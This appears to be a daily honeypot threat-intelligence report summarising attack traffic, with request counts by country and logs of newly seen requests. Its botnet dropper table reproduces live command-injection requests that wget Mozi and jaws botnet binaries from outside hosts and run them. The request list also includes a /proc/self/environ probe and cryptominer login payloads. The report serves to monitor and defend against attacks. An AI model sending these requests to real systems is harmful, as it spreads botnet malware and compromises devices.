Report: 2025-05-14

Author: Shoggoth Industries

Daily Report: 2025-05-14

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 19 new requests that have never been observed before (these were added to the monitored request database).

A total of 1098 requests were recorded during the day, originating from 5 different countries, with a peak of 215 requests coming from BG.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| US | Dubai |
| CN | Georgia |
| FR | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 47.93.212.99 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsselfrep;chmod+777+/tmp/jawsselfrep;sh+/tmp/jaws.selfrep HTTP/1.1 |
| 115.63.240.101 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 156.212.104.100 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1 |
| 60.23.232.109 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://60.23.232.109:37651/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 103.42.243.6 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.10.146.242:56641/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |

request

The requests listed here are those that have not yet been integrated into the request database.

number_of_occurencerequest
694GET /goform/formJsonAjaxReq HTTP/1.1
773GET /@fs/proc/self/environ?raw?? HTTP/1.1
1221GET /OZGl HTTP/1.1
1291POST /api/user/binLookup?time=1747193185668050900 HTTP/1.1
1301GET /api/bin/440393?time=1747193184575167987 HTTP/1.1
1311GET /config/index?time=1747192974832206021 HTTP/1.1
1321GET /9VWw HTTP/1.1
1331GET /Y6al HTTP/1.1
1851GET /socket.io/1/?t=1747236057213 HTTP/1.1
1871GET /stalker_portal/c HTTP/1.1
1931HEAD /files.rar HTTP/1.1
2071GET /www/.git HTTP/1.1
2171GET /9Dop HTTP/1.1
2181GET /VHGx HTTP/1.1
2511{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x224967iFVimMwZ41gfEG2S5aYTBPDMYwJ9LRJQyepwyggnfUYMgkdqAjB25N7JKCmmS3BqummF2gEbDNnAXBh513zxQqPdwE5\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
2521{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x120dc7ce9f5d58d67c2d3c96da8e1a3b6d0fffbe\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
2631GET /cfg/test HTTP/1.1
2701CONNECT ipinfo.io:443 HTTP/1.1
3201GET /CNzR HTTP/1.1

country_iso_code

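|  | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 215 | BG |
| 1 | 213 | US |
| 2 | 147 | GB |
| 3 | 66 | NL |
| 4 | 62 | CH |
| 5 | 50 | PL |
| 6 | 49 | BE |
| 7 | 42 | SC |
| 8 | 35 | FR |
| 9 | 33 | ES |
| 10 | 24 | CN |
| 11 | 18 | DE |
| 12 | 13 | LT |
| 13 | 13 | KR |
| 14 | 12 | AZ |
| 15 | 12 | SG |
| 16 | 11 | PT |
| 17 | 9 | NG |
| 18 | 7 | GH |
| 19 | 5 | RU |
| 20 | 5 | TH |
| 21 | 5 | JP |
| 22 | 5 | IT |
| 23 | 5 | UA |
| 24 | 4 | BR |
| 25 | 4 | CA |
| 26 | 4 | IL |
| 27 | 4 | TR |
| 28 | 3 | VN |
| 29 | 3 | ID |
| 30 | 3 | IN |
| 31 | 2 | HK |
| 32 | 2 | TW |
| 33 | 2 | IR |
| 34 | 2 | CZ |
| 35 | 2 | VE |
| 36 | 2 | AU |
| 37 | 1 | EG |
| 38 | 1 | MD |
| 39 | 1 | CY |
| 40 | 1 | GE |
| 41 | 1 | ZA |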
